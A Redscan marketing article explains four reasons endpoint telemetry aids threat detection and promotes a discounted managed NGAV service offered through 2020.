Network security data has long been the lifeblood of threat detection, but to achieve optimum visibility, supporting data from endpoints is just as important.
Here, Redscan’s Head of Threat Intelligence, George Glass, outlines why endpoint telemetry is now fundamental to reducing the time taken to identify and remediate security incidents.
1. It helps to minimise visibility blind spots
The aggregation and analysis of network-based data remains vital to threat detection. However, without endpoint telemetry to provide broader visibility across the IT estate, there is a significant risk that some types of malicious behaviour can go unseen.
Digital transformation, including widespread cloud adoption and mass remote working, is exacerbating the risk of blind spots by dissolving the network perimeter and creating a larger surface to monitor.
Without endpoint telemetry to help paint a more complete picture, security teams may lack awareness of when and how key assets are compromised. There is a real danger that breaches won’t be discovered until after an attacker has gained a foothold.
Since the start of the COVID-19 pandemic, the Redscan team has witnessed a huge increase in attacks against endpoint devices. Phishing campaigns, abuse of VPN and RDP services, and websites initiating drive-by downloads are all pressing risks which call for more extensive visibility of users and their devices.
2. It helps detect adversary behaviours sooner
Adversaries are constantly evolving their range of approaches to evade detection. Endpoint telemetry helps security teams to enhance threat detection coverage – the range of adversarial techniques that are observable – and identify malicious activity earlier in the cyber kill chain.
Powershell abuse and process injection (techniques used to trigger fileless malware attacks) are just two in a growing list of TTPs which can only be identified by the use of endpoint telemetry. Fileless malware is a serious risk to organisations and the top critical threat to endpoints in 2020.
Minimising attacker dwell time is imperative given the serious damage that attackers can inflict in a very short period. Critical vulnerabilities such as Zerologon mean that ransomware attacks are able to achieve full domain-wide encryption in a matter of hours.
3. It provides greater context
In isolation, network-based detections often lack the necessary detail needed to make fast, resolute decisions. This is the reason that security teams can struggle to determine conclusively whether an organisation is genuinely under attack and why alert fatigue remains such a big problem. Analysts are forced to review hundreds of disparate alerts because they lack the situational awareness to know whether any are linked to the same incident.
Armed with supplementary data from endpoints, security teams can more reliably determine whether activity is malicious or benign, conduct forensic investigations to understand the full scope and kill chain of attacks and respond more quickly and effectively.
4. It can help detect unknown threats
Given the speed of attacker innovation, threat detection shouldn’t just be concerned with the detection of known threats. Identification of unknown attackers using new tools, tactics and procedures (TTPs) is also important for minimising risk.
Proactive detection of emerging threats is referred to as threat hunting, a process which requires a wide range of current and historical data to yield results.
Telemetry from endpoints is crucial to threat hunting, providing the information that hunters need to study and hypothesise about current threat behaviours as well as informing the creation of detection rules and watch lists to identify new ones.
How to obtain the right endpoint telemetry
To achieve the level of endpoint visibility required to detect and respond to the latest threats, organisations increasingly need to look beyond traditional endpoint security solutions in favour of Next Generation Anti-virus (NGAV) and Endpoint Detection and Response (EDR) tools.
By collecting raw telemetry relating to processes, file modifications, registry changes and network connections, and using advanced behavioural analytics to examine events in near real-time, NGAV and EDR technologies provide deep visibility across devices. But the benefits don’t stop there. Many of the latest solution also help to accelerate incident response by giving security teams the power to ban hashes, terminate processes and isolate infected endpoints.
However, realising the value of endpoint telemetry isn’t simply about installing the right tool and capturing every piece of information available. To obtain the best outcomes, it’s important to have a clear understanding of the right data to analyse, an ability to enrich it, and also a capacity to respond swiftly and effectively when malicious activity is detected.
Save 35% when you subscribe to our Managed NGAV service
Between now and the end of 2020, Redscan is offering 35% off the list price* for managed Next-Gen AV (including technology licences).
Contact your Sales Manager or Technical Account Manager for a quotation, or fill in the form below for a prompt call back.
Request a quote
Complete the form to learn more and save 35% on our Managed NGAV services
Terms and conditions
- 35% discount is off the total list price of a 12 month package to Redscan’s ThreatDetect service for endpoints (including software licences).
- Minimum order quantity is 50 licences.
- Software installation by Redscan is not included as part of the offer and subject to a supplementary fee.
- Redscan reserves the right to withdraw or change the terms of this offer at any time.
- Offer applies to all orders received by 31st December 2020.